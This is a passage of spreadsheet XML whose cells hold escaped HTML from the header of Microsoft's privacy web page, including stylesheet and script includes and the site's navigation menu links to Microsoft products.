    <t>href="https://www.microsoft.com/onerfstatics/marketingsites-eus-prod/west-european/shell/_scrf/css/themes=default.device=uplevel_web_pc/79-4cdd0a/33-ae3d41/a5-4bf7a2/13-8e1ceb/81-32f0c0/5c-b7b685/51-0a6e40/74-888e54?ver=2.0&amp;amp;amp;_cf=02242021_3231" rel="stylesheet" type="text/css" media="screen" /&gt;&lt;link href="https://statics-marketingsites-eus-ms-com.akamaized.net/statics/override.css" rel="stylesheet" type="text/css" media="screen" /&gt;&lt;link rel="stylesheet" type="text/css" href="https://c.s-microsoft.com/en-us/CMSStyles/style.csx?k=b38e7b38-f2bd-90bd-16b5-45a457a50550" /&gt;&lt;link href="https://assets.onestore.ms/cdnfiles/external/oneui/oneui1.16.2/dist/css/app.css" rel="stylesheet" type="text/css" media="screen" /&gt;&lt;link href="https://assets.onestore.ms/cdnfiles/onestorerolling-1510-19009/shell/v3/scss/shell.min.css" rel="stylesheet" type="text/css" media="screen" /&gt;&lt;script type="text/javascript" src="https://ajax.aspnetcdn.com/ajax/jQuery/jquery-1.9.1.min.js"&gt;&lt;/script&gt;&lt;script type="text/javascript" src="https://www.microsoft.com/onerfstatics/marketingsites-eus-prod/shell/_scrf/js/themes=default/8e-e88b64/82-2a4f02/49-a00ab0/92-02e55d/7c-dcea75/75-fca72d/ed-e77ee7/d5-bf34c0/a9-078595/7a-7ea8cc/2d-40bdad/23-e8cd2b/96-eb5423/e6-6b0cce/d1-98d78a/c6-082272/a7-f7a340/1e-addbef/2e-ca165a/fc-169dd8/8e-60935c/87-fecbed/96-6ed6eb/c3-eb62e0/ad-ffd6bf/35-621acc/3b-84517a/b0-07f293/1e-9d9d16/52-f0367f/94-1dce2c/bf-517249/e1-ed258e/20-0b10e2/6b-0f1117/fb-5e9831/a2-598841?ver=2.0&amp;amp;_cf=02242021_3231&amp;amp;iife=1"&gt;&lt;/script&gt;&lt;link href="https://privacy.microsoft.com/en-us/privacystatement" rel="canonical" /&gt;&lt;script type="text/javascript" src="https://c.s-microsoft.com/en-us/CMSScripts/script.jsx?k=37fd2120-b492-9f43-c3fb-1987973beae7"&gt;&lt;/script&gt;&lt;/head&gt;&lt;body class="mscom-nonjs mscom-hp-theme-layout"&gt;&lt;span class="page-data-sources"&gt;&lt;/span&gt;&lt;!-- UHF CSS Workarounds --&gt;&lt;span&gt;&lt;div</t>
  </si>
  <si>
    <t>id="headerArea" class="uhf" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;headerArea&amp;quot;,&amp;quot;cT&amp;quot;:&amp;quot;Area_coreuiArea&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;a1Body&amp;quot;,&amp;quot;sN&amp;quot;:1,&amp;quot;aN&amp;quot;:&amp;quot;Body&amp;quot;}"&gt;&lt;div id="headerRegion" data-region-key="headerregion" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;headerRegion&amp;quot;,&amp;quot;cT&amp;quot;:&amp;quot;Region_coreui-region&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;r1a1&amp;quot;,&amp;quot;sN&amp;quot;:1,&amp;quot;aN&amp;quot;:&amp;quot;a1&amp;quot;}"&gt;&lt;div id="headerUniversalHeader" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;headerUniversalHeader&amp;quot;,&amp;quot;cT&amp;quot;:&amp;quot;Module_coreui-universalheader&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:1,&amp;quot;aN&amp;quot;:&amp;quot;r1a1&amp;quot;}" data-module-id="Category|headerRegion|coreui-region|headerUniversalHeader|coreui-universalheader"&gt;&lt;a id="uhfSkipToMain" class="m-skip-to-main" href="javascript:void(0)" data-href="" tabindex="0" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;Skip to content_nonnav&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;nn1m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:1,&amp;quot;aN&amp;quot;:&amp;quot;m1r1a1&amp;quot;}"&gt;Skip to main content&lt;/a&gt;&lt;header class="c-uhfh context-uhf no-js c-sgl-stck c-category-header " itemscope="itemscope" data-header-footprint="/MSPrivacyMicrosoftcom/MSPrivacyMicrosoftComHeaderLogo, fromService: True" data-magict="true" itemtype="http://schema.org/Organization"&gt;&lt;div class="theme-light js-global-head f-closed  global-head-cont" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;Universal Header_cont&amp;quot;,&amp;quot;cT&amp;quot;:&amp;quot;Container&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:2,&amp;quot;aN&amp;quot;:&amp;quot;m1r1a1&amp;quot;}"&gt;&lt;div class="c-uhfh-gcontainer-st"&gt;&lt;button type="button" class="c-action-trigger c-glyph glyph-global-nav-button" aria-label="All Microsoft expand to see list of Microsoft products and services" initialstate-label="All Microsoft expand to see list of Microsoft products and services" togglestate-label="Close All Microsoft list" aria-expanded="false" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;Mobile menu button_nonnav&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;nn1c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:1,&amp;quot;aN&amp;quot;:&amp;quot;c2m1r1a1&amp;quot;}"&gt;&lt;/button&gt;&lt;button type="button" class="c-action-trigger c-glyph glyph-arrow-htmllegacy c-close-search" aria-expanded="false" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;Close Search_nonnav&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;nn2c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:2,&amp;quot;aN&amp;quot;:&amp;quot;c2m1r1a1&amp;quot;}"&gt;&lt;/button&gt;&lt;span class="c-logo c-logo-index c-sgl-stk-uhfLogo" role="img" aria-label="Microsoft"&gt;&lt;img alt="" itemprop="logo" class="c-image" src="https://img-prod-cms-rt-microsoft-com.akamaized.net/cms/api/am/imageFileData/RE1Mu3b?ver=5c31" role="none" /&gt;&lt;span itemprop="name" role="presentation" aria-hidden="true"&gt;Microsoft&lt;/span&gt;&lt;/span&gt;&lt;div class="f-mobile-title"&gt;&lt;button type="button" class="c-action-trigger c-glyph glyph-chevron-left" aria-label="See more menu options" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;Mobile back button_nonnav&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;nn3c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:3,&amp;quot;aN&amp;quot;:&amp;quot;c2m1r1a1&amp;quot;}"&gt;&lt;/button&gt;&lt;span data-global-title="Microsoft home" class="js-mobile-title"&gt;Privacy&lt;/span&gt;&lt;button type="button" class="c-action-trigger c-glyph glyph-chevron-right" aria-label="See more menu options" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;Mobile forward button_nonnav&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;nn4c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:4,&amp;quot;aN&amp;quot;:&amp;quot;c2m1r1a1&amp;quot;}"&gt;&lt;/button&gt;&lt;/div&gt;&lt;div class="c-show-pipe x-hidden-vp-mobile-st"&gt;&lt;a id="uhfCatLogo" class="c-logo c-cat-logo" href="https://privacy.microsoft.com" aria-label="Privacy" itemprop="url" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;CatNav_Privacy_nav&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;n5c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:5,&amp;quot;aN&amp;quot;:&amp;quot;c2m1r1a1&amp;quot;}"&gt;&lt;span&gt;Privacy&lt;/span&gt;&lt;/a&gt;&lt;/div&gt;&lt;div class="cat-logo-button-cont x-hidden"&gt;&lt;button type="button" id="uhfCatLogoButton" class="c-cat-logo-button x-hidden" aria-expanded="false" aria-label="Privacy" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;Privacy_nonnav&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;nn6c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:6,&amp;quot;aN&amp;quot;:&amp;quot;c2m1r1a1&amp;quot;}"&gt;_x005F_x000D_
                            Privacy_x005F_x000D_
                        &lt;/button&gt;&lt;/div&gt;&lt;nav id="uhf-g-nav" aria-label="Contextual menu" class="c-uhfh-gnav" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;Category nav_cont&amp;quot;,&amp;quot;cT&amp;quot;:&amp;quot;Container&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;c7c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:7,&amp;quot;aN&amp;quot;:&amp;quot;c2m1r1a1&amp;quot;}"&gt;&lt;ul class="js-paddle-items"&gt;&lt;li class="single-link js-nav-menu x-hidden-none-mobile-vp uhf-menu-item"&gt;&lt;a class="c-uhf-nav-link" href="https://privacy.microsoft.com" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;CatNav_Home_nav&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;n1c7c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:1,&amp;quot;aN&amp;quot;:&amp;quot;c7c2m1r1a1&amp;quot;}"&gt; Home &lt;/a&gt;&lt;/li&gt;&lt;li class="single-link js-nav-menu uhf-menu-item"&gt;&lt;a</t>
  </si>
  <si>
    <t>id="Privacy dashboard" class="c-uhf-nav-link" href="https://account.microsoft.com/privacy" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;CatNav_Privacy dashboard_nav&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;n2c7c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:2,&amp;quot;aN&amp;quot;:&amp;quot;c7c2m1r1a1&amp;quot;}"&gt;Privacy dashboard&lt;/a&gt;&lt;/li&gt;&lt;li class="single-link js-nav-menu uhf-menu-item"&gt;&lt;a id="Privacy report" class="c-uhf-nav-link" href="https://aka.ms/PrivacyReport" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;CatNav_Privacy report_nav&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;n3c7c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:3,&amp;quot;aN&amp;quot;:&amp;quot;c7c2m1r1a1&amp;quot;}"&gt;Privacy report&lt;/a&gt;&lt;/li&gt;&lt;li class="single-link js-nav-menu uhf-menu-item"&gt;&lt;a id="Privacy settings" class="c-uhf-nav-link" href="https://support.microsoft.com/topic/206f6928-2694-4adf-a50f-9edb95897d81" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;CatNav_Privacy settings_nav&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;n4c7c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:4,&amp;quot;aN&amp;quot;:&amp;quot;c7c2m1r1a1&amp;quot;}"&gt;Privacy settings&lt;/a&gt;&lt;/li&gt;&lt;li class="single-link js-nav-menu uhf-menu-item"&gt;&lt;a id="Privacy Statement" class="c-uhf-nav-link" href="https://go.microsoft.com/fwlink/?LinkId=521839" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;CatNav_Privacy Statement_nav&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;n5c7c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:5,&amp;quot;aN&amp;quot;:&amp;quot;c7c2m1r1a1&amp;quot;}"&gt;Privacy Statement&lt;/a&gt;&lt;/li&gt;&lt;li id="overflow-menu" class="overflow-menu x-hidden uhf-menu-item"&gt;&lt;div class="c-uhf-menu js-nav-menu"&gt;&lt;button data-m="{&amp;quot;pid&amp;quot;:&amp;quot;More&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;nn6c7c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:6,&amp;quot;aN&amp;quot;:&amp;quot;c7c2m1r1a1&amp;quot;}" type="button" aria-label="More" aria-expanded="false"&gt;More&lt;/button&gt;&lt;ul id="overflow-menu-list" aria-hidden="true" class="overflow-menu-list"&gt;&lt;/ul&gt;&lt;/div&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/nav&gt;&lt;div class="c-uhfh-actions no-uhf-actions-exists" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;Header actions_cont&amp;quot;,&amp;quot;cT&amp;quot;:&amp;quot;Container&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:8,&amp;quot;aN&amp;quot;:&amp;quot;c2m1r1a1&amp;quot;}"&gt;&lt;div class="wf-menu"&gt;&lt;nav id="uhf-c-nav" aria-label="All Microsoft menu" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;GlobalNav_cont&amp;quot;,&amp;quot;cT&amp;quot;:&amp;quot;Container&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:1,&amp;quot;aN&amp;quot;:&amp;quot;c8c2m1r1a1&amp;quot;}"&gt;&lt;ul class="js-paddle-items"&gt;&lt;li&gt;&lt;div class="c-uhf-menu js-nav-menu"&gt;&lt;button type="button" class="c-button-logo all-ms-nav" aria-expanded="false" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;GlobalNav_More_nonnav&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;nn1c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:1,&amp;quot;aN&amp;quot;:&amp;quot;c1c8c2m1r1a1&amp;quot;}"&gt;&lt;span&gt;All Microsoft&lt;/span&gt;&lt;/button&gt;&lt;ul class="f-multi-column f-multi-column-6" aria-hidden="true" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;More_cont&amp;quot;,&amp;quot;cT&amp;quot;:&amp;quot;Container&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:2,&amp;quot;aN&amp;quot;:&amp;quot;c1c8c2m1r1a1&amp;quot;}"&gt;&lt;li class="c-w0-contr"&gt;&lt;h2 class="c-uhf-sronly"&gt;Global&lt;/h2&gt;&lt;ul class="c-w0"&gt;&lt;li class="js-nav-menu single-link" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;M365_cont&amp;quot;,&amp;quot;cT&amp;quot;:&amp;quot;Container&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;c1c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:1,&amp;quot;aN&amp;quot;:&amp;quot;c2c1c8c2m1r1a1&amp;quot;}"&gt;&lt;a id="shellmenu_4" class="js-subm-uhf-nav-link" href="https://www.microsoft.com/microsoft-365" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;W0Nav_M365_nav&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;n1c1c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:1,&amp;quot;aN&amp;quot;:&amp;quot;c1c2c1c8c2m1r1a1&amp;quot;}"&gt;Microsoft 365&lt;/a&gt;&lt;/li&gt;&lt;li class="js-nav-menu single-link" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;Teams_cont&amp;quot;,&amp;quot;cT&amp;quot;:&amp;quot;Container&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;c2c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:2,&amp;quot;aN&amp;quot;:&amp;quot;c2c1c8c2m1r1a1&amp;quot;}"&gt;&lt;a id="l0_Teams" class="js-subm-uhf-nav-link" href="https://www.microsoft.com/microsoft-teams/group-chat-software" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;W0Nav_Teams_nav&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;n1c2c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:1,&amp;quot;aN&amp;quot;:&amp;quot;c2c2c1c8c2m1r1a1&amp;quot;}"&gt;Teams&lt;/a&gt;&lt;/li&gt;&lt;li class="js-nav-menu single-link" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;Windows_cont&amp;quot;,&amp;quot;cT&amp;quot;:&amp;quot;Container&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;c3c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:3,&amp;quot;aN&amp;quot;:&amp;quot;c2c1c8c2m1r1a1&amp;quot;}"&gt;&lt;a id="shellmenu_6" class="js-subm-uhf-nav-link" href="https://www.microsoft.com/en-us/windows/" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;W0Nav_Windows_nav&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;n1c3c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:1,&amp;quot;aN&amp;quot;:&amp;quot;c3c2c1c8c2m1r1a1&amp;quot;}"&gt;Windows&lt;/a&gt;&lt;/li&gt;&lt;li class="js-nav-menu single-link" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;Surface_cont&amp;quot;,&amp;quot;cT&amp;quot;:&amp;quot;Container&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;c4c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:4,&amp;quot;aN&amp;quot;:&amp;quot;c2c1c8c2m1r1a1&amp;quot;}"&gt;&lt;a id="shellmenu_7" class="js-subm-uhf-nav-link" href="https://www.microsoft.com/surface" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;W0Nav_Surface_nav&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;n1c4c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:1,&amp;quot;aN&amp;quot;:&amp;quot;c4c2c1c8c2m1r1a1&amp;quot;}"&gt;Surface&lt;/a&gt;&lt;/li&gt;&lt;li class="js-nav-menu single-link" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;Xbox_cont&amp;quot;,&amp;quot;cT&amp;quot;:&amp;quot;Container&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;c5c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:5,&amp;quot;aN&amp;quot;:&amp;quot;c2c1c8c2m1r1a1&amp;quot;}"&gt;&lt;a id="shellmenu_8" class="js-subm-uhf-nav-link" href="https://www.xbox.com/" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;W0Nav_Xbox_nav&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;n1c5c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:1,&amp;quot;aN&amp;quot;:&amp;quot;c5c2c1c8c2m1r1a1&amp;quot;}"&gt;Xbox&lt;/a&gt;&lt;/li&gt;&lt;li class="js-nav-menu single-link" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;Deals_cont&amp;quot;,&amp;quot;cT&amp;quot;:&amp;quot;Container&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;c6c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:6,&amp;quot;aN&amp;quot;:&amp;quot;c2c1c8c2m1r1a1&amp;quot;}"&gt;&lt;a id="shellmenu_9" class="js-subm-uhf-nav-link" href="https://www.microsoft.com/en-us/store/b/sale?icid=gm_nav_L0_salepage" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;W0Nav_Deals_nav&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;n1c6c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:1,&amp;quot;aN&amp;quot;:&amp;quot;c6c2c1c8c2m1r1a1&amp;quot;}"&gt;Deals&lt;/a&gt;&lt;/li&gt;&lt;li class="js-nav-menu single-link" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;Small Business_cont&amp;quot;,&amp;quot;cT&amp;quot;:&amp;quot;Container&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;c7c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:7,&amp;quot;aN&amp;quot;:&amp;quot;c2c1c8c2m1r1a1&amp;quot;}"&gt;&lt;a id="l0_SmallBusiness" class="js-subm-uhf-nav-link" href="https://www.microsoft.com/en-us/store/b/business" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;W0Nav_Small Business_nav&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;n1c7c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:1,&amp;quot;aN&amp;quot;:&amp;quot;c7c2c1c8c2m1r1a1&amp;quot;}"&gt;Small Business&lt;/a&gt;&lt;/li&gt;&lt;li class="js-nav-menu single-link" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;Support_cont&amp;quot;,&amp;quot;cT&amp;quot;:&amp;quot;Container&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;c8c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:8,&amp;quot;aN&amp;quot;:&amp;quot;c2c1c8c2m1r1a1&amp;quot;}"&gt;&lt;a id="l1_support" class="js-subm-uhf-nav-link" href="https://support.microsoft.com/en-us" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;W0Nav_Support_nav&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;n1c8c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:1,&amp;quot;aN&amp;quot;:&amp;quot;c8c2c1c8c2m1r1a1&amp;quot;}"&gt;Support&lt;/a&gt;&lt;/li&gt;&lt;/ul&gt;&lt;/li&gt;&lt;li class="f-sub-menu js-nav-menu nested-menu" data-m="{&amp;quot;cT&amp;quot;:&amp;quot;Container&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;c9c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:9,&amp;quot;aN&amp;quot;:&amp;quot;c2c1c8c2m1r1a1&amp;quot;}"&gt;&lt;span id="uhf-navspn-shellmenu_13-span" style="display:none" f-multi-parent="true" aria-expanded="false" data-m="{&amp;quot;id&amp;quot;:&amp;quot;nn1c9c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:1,&amp;quot;aN&amp;quot;:&amp;quot;c9c2c1c8c2m1r1a1&amp;quot;}"&gt;Software&lt;/span&gt;&lt;button id="uhf-navbtn-shellmenu_13-button" type="button" f-multi-parent="true" aria-expanded="false" data-m="{&amp;quot;id&amp;quot;:&amp;quot;nn2c9c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:2,&amp;quot;aN&amp;quot;:&amp;quot;c9c2c1c8c2m1r1a1&amp;quot;}"&gt;Software&lt;/button&gt;&lt;ul aria-hidden="true" aria-labelledby="uhf-navspn-shellmenu_13-span"&gt;&lt;li class="js-nav-menu single-link" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;More_Software_WindowsApps_cont&amp;quot;,&amp;quot;cT&amp;quot;:&amp;quot;Container&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;c3c9c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:3,&amp;quot;aN&amp;quot;:&amp;quot;c9c2c1c8c2m1r1a1&amp;quot;}"&gt;&lt;a id="shellmenu_14" class="js-subm-uhf-nav-link" href="https://www.microsoft.com/en-us/store/apps/windows?icid=CNavAppsWindowsApps" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;GlobalNav_More_Software_WindowsApps_nav&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;n1c3c9c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:1,&amp;quot;aN&amp;quot;:&amp;quot;c3c9c2c1c8c2m1r1a1&amp;quot;}"&gt;Windows Apps&lt;/a&gt;&lt;/li&gt;&lt;li class="js-nav-menu single-link" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;More_Software_AI_cont&amp;quot;,&amp;quot;cT&amp;quot;:&amp;quot;Container&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;c4c9c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:4,&amp;quot;aN&amp;quot;:&amp;quot;c9c2c1c8c2m1r1a1&amp;quot;}"&gt;&lt;a id="shellmenu_15" class="js-subm-uhf-nav-link" href="https://www.microsoft.com/ai" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;GlobalNav_More_Software_AI_nav&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;n1c4c9c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:1,&amp;quot;aN&amp;quot;:&amp;quot;c4c9c2c1c8c2m1r1a1&amp;quot;}"&gt;AI&lt;/a&gt;&lt;/li&gt;&lt;li class="js-nav-menu single-link" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;More_Software_Outlook_cont&amp;quot;,&amp;quot;cT&amp;quot;:&amp;quot;Container&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;c5c9c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:5,&amp;quot;aN&amp;quot;:&amp;quot;c9c2c1c8c2m1r1a1&amp;quot;}"&gt;&lt;a id="shellmenu_16" class="js-subm-uhf-nav-link" href="https://outlook.live.com/owa/" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;GlobalNav_More_Software_Outlook_nav&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;n1c5c9c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:1,&amp;quot;aN&amp;quot;:&amp;quot;c5c9c2c1c8c2m1r1a1&amp;quot;}"&gt;Outlook&lt;/a&gt;&lt;/li&gt;&lt;li class="js-nav-menu single-link" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;More_Software_OneDrive_cont&amp;quot;,&amp;quot;cT&amp;quot;:&amp;quot;Container&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;c6c9c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:6,&amp;quot;aN&amp;quot;:&amp;quot;c9c2c1c8c2m1r1a1&amp;quot;}"&gt;&lt;a id="shellmenu_17" class="js-subm-uhf-nav-link" href="https://onedrive.live.com/about/en-us/" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;GlobalNav_More_Software_OneDrive_nav&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;n1c6c9c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:1,&amp;quot;aN&amp;quot;:&amp;quot;c6c9c2c1c8c2m1r1a1&amp;quot;}"&gt;OneDrive&lt;/a&gt;&lt;/li&gt;&lt;li class="js-nav-menu single-link" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;More_Software_Microsoft Teams_cont&amp;quot;,&amp;quot;cT&amp;quot;:&amp;quot;Container&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;c7c9c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:7,&amp;quot;aN&amp;quot;:&amp;quot;c9c2c1c8c2m1r1a1&amp;quot;}"&gt;&lt;a id="shellmenu_18" class="js-subm-uhf-nav-link" href="https://www.microsoft.com/EN-US/microsoft-teams/group-chat-software" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;GlobalNav_More_Software_Microsoft Teams_nav&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;n1c7c9c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:1,&amp;quot;aN&amp;quot;:&amp;quot;c7c9c2c1c8c2m1r1a1&amp;quot;}"&gt;Microsoft Teams&lt;/a&gt;&lt;/li&gt;&lt;li class="js-nav-menu single-link" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;More_Software_OneNote_cont&amp;quot;,&amp;quot;cT&amp;quot;:&amp;quot;Container&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;c8c9c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:8,&amp;quot;aN&amp;quot;:&amp;quot;c9c2c1c8c2m1r1a1&amp;quot;}"&gt;&lt;a id="shellmenu_19" class="js-subm-uhf-nav-link" href="https://www.onenote.com/" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;GlobalNav_More_Software_OneNote_nav&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;n1c8c9c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:1,&amp;quot;aN&amp;quot;:&amp;quot;c8c9c2c1c8c2m1r1a1&amp;quot;}"&gt;OneNote&lt;/a&gt;&lt;/li&gt;&lt;li class="js-nav-menu single-link" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;More_Software_Edge_cont&amp;quot;,&amp;quot;cT&amp;quot;:&amp;quot;Container&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;c9c9c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:9,&amp;quot;aN&amp;quot;:&amp;quot;c9c2c1c8c2m1r1a1&amp;quot;}"&gt;&lt;a id="shellmenu_20" class="js-subm-uhf-nav-link" href="https://www.microsoft.com/edge" data-m="{&amp;quot;cN&amp;quot;:&amp;quot;GlobalNav_More_Software_Edge_nav&amp;quot;,&amp;quot;id&amp;quot;:&amp;quot;n1c9c9c2c1c8c2m1r1a1&amp;quot;,&amp;quot;sN&amp;quot;:1,&amp;quot;aN&amp;quot;:&amp;quot;c9c9c2c1c8c2m1r1a1&amp;quot;}"&gt;Microsoft Edge&lt;/a&gt;&lt;/li&gt;&lt;li class="js-nav-menu single-link" 